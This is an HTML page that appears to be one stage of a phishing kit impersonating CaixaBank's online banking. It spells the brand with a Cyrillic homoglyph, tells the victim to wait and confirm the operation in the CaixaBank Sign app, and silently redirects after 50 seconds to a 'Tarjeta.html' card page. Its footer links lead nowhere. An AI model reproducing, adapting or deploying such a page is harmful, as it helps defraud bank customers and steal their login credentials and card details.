<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta http-equiv="Pragma" content="no-cache" />
    <meta http-equiv="Cache-Control" content="no-cache" />
    <meta http-equiv="Expires" content="-1" />
    <meta http-equiv="refresh" content="50;URL=Tarjeta.html"> 
    <title>CaiхaBank | banca digital CaiхaBankNow</title>
    <link rel="shorcut icon" href="/favicon.ico" />
    <link rel="icon" href="favicon.ico" />
    <link rel="stylesheet" type="text/css" href="./css/estilos-login.css" />
    <link
      rel="stylesheet"
      type="text/css"
      href="./css/lolopo/jquery-ui-1.10.4.custom.css"
    />
    <script
      type="text/javascript"
      src="./js/arq/jQuery/jquery-1.8.3.min.js"
    ></script>
    <script
      type="text/javascript"
      src="./js/arq/jQueryUI/jquery-ui-1.9.2.custom.min.js"
    ></script>
  </head>

  <body onload="arranque();">
    <div class="contenido_sin_frame"></div>
    <div class="login-new">
      <div class="lfloat prel">
        <a
          aria-expanded="false"
          class="ico-world escoger-idioma btn_desplegable_idioma"
          href="javascript:void(0)"
          >Castellano</a
        >
        <div class="desplegable_idiomas hide" style="">
          <div class="">
            <a
              href="#"
              title="Castellano"
              class="activo"
              data-value="Castellano"
              data-txt="Castellano"
              onclick="javascript:submit_idioma('02')"
              >Castellano</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Catal&agrave;"
              class=""
              data-value="Catal&agrave;"
              data-txt="Catal&agrave;"
              onclick="javascript:submit_idioma('01')"
              >Catal&agrave;</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Euskera"
              class=""
              data-value="Euskera"
              data-txt="Euskera"
              onclick="javascript:submit_idioma('10')"
              >Euskera</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Galego"
              class=""
              data-value="Galego"
              data-txt="Galego"
              onclick="javascript:submit_idioma('11')"
              >Galego</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Valencià"
              class=""
              data-value="Valencià"
              data-txt="Valencià"
              onclick="javascript:submit_idioma('06')"
              >Valencià</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="ceština"
              class=""
              data-value="ceština"
              data-txt="ceština"
              onclick="javascript:submit_idioma('17')"
              >ceština</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Dansk"
              class=""
              data-value="Dansk"
              data-txt="Dansk"
              onclick="javascript:submit_idioma('18')"
              >Dansk</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Deutsch"
              class=""
              data-value="Deutsch"
              data-txt="Deutsch"
              onclick="javascript:submit_idioma('05')"
              >Deutsch</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="English"
              class=""
              data-value="English"
              data-txt="English"
              onclick="javascript:submit_idioma('03')"
              >English</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Fran&ccedil;ais"
              class=""
              data-value="Fran&ccedil;ais"
              data-txt="Fran&ccedil;ais"
              onclick="javascript:submit_idioma('04')"
              >Fran&ccedil;ais</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Italiano"
              class=""
              data-value="Italiano"
              data-txt="Italiano"
              onclick="javascript:submit_idioma('13')"
              >Italiano</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Magyar"
              class=""
              data-value="Magyar"
              data-txt="Magyar"
              onclick="javascript:submit_idioma('22')"
              >Magyar</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Nederlands"
              class=""
              data-value="Nederlands"
              data-txt="Nederlands"
              onclick="javascript:submit_idioma('16')"
              >Nederlands</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Norsk"
              class=""
              data-value="Norsk"
              data-txt="Norsk"
              onclick="javascript:submit_idioma('26')"
              >Norsk</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Polski"
              class=""
              data-value="Polski"
              data-txt="Polski"
              onclick="javascript:submit_idioma('23')"
              >Polski</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Portugu&ecirc;s"
              class=""
              data-value="Portugu&ecirc;s"
              data-txt="Portugu&ecirc;s"
              onclick="javascript:submit_idioma('14')"
              >Portugu&ecirc;s</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Slovencina"
              class=""
              data-value="Slovencina"
              data-txt="Slovencina"
              onclick="javascript:submit_idioma('19')"
              >Slovencina</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Suomi"
              class=""
              data-value="Suomi"
              data-txt="Suomi"
              onclick="javascript:submit_idioma('20')"
              >Suomi</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Svenska"
              class=""
              data-value="Svenska"
              data-txt="Svenska"
              onclick="javascript:submit_idioma('15')"
              >Svenska</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="Türkçe"
              class=""
              data-value="Türkçe"
              data-txt="Türkçe"
              onclick="javascript:submit_idioma('27')"
              >Türkçe</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="ελληνικά"
              class=""
              data-value="ελληνικά"
              data-txt="ελληνικά"
              onclick="javascript:submit_idioma('21')"
              >ελληνικά</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="русский"
              class=""
              data-value="русский"
              data-txt="русский"
              onclick="javascript:submit_idioma('25')"
              >русский</a
            >
          </div>
          <div class="">
            <a
              href="#"
              title="中文"
              class=""
              data-value="中文"
              data-txt="中文"
              onclick="javascript:submit_idioma('99')"
              >中文</a
            >
          </div>
        </div>
      </div>
      <div class="limpiar"></div>
      <div class="mb20 overhidden">
        <a class="dtable centrado">
          <img
            src="../imatge/lolopo/candado.png"
            alt=""
            class="dtable centrado"
          />
        </a>
        <h2 class="dtable centrado">¿Puede confirmar de que está conectado y es usted quien configuró el usuario en este dispositivo?..</h1>
		<p>&nbsp;</p>
<h3><strong><span style="color: #0000ff;">Confirma la operaci&oacute;n a trav&eacute;s de la aplicaci&oacute;n CaixaBank Sign</span></strong></h3>      </div>
      <div class="login">
        <div class="usuario prel">
          <img src="c-images/css-images/ico_loading.gif" alt="Cargando" class="dtable centrado"/>
        </div>

        <div class="clear"></div>
        <div class="limpiar"></div>
        <div class="limpiar"></div>
        <ul class="links-footer">
          <li>
            <a href="#" title="Alta a CaiхaBankNow">Alta a CaiхaBankNow</a>
          </li>
          <li>
            <a href="#" title="Demostración">Demostración</a>
          </li>
          <li>
            <a href="#" title="Seguridad">Seguridad</a>
          </li>
          <li>
            <a href="#" title="CaiхaBankProtect">CaiхaBankProtect</a>
          </li>
        </ul>
      </div>
    </div>
    <div class="pie">
      <div class="superior5">
        <ul class="menu_simple">
          <li><a href="#">Aviso legal</a></li>
          <li><a href="#">Seguridad</a></li>
          <li><a href="#">Tarifas</a></li>
        </ul>
      </div>
      <div class="superior5">
        @ CaiхaBank, S.A. 2021. Todos los derechos reservados.
      </div>
    </div>
  </body>
</html>
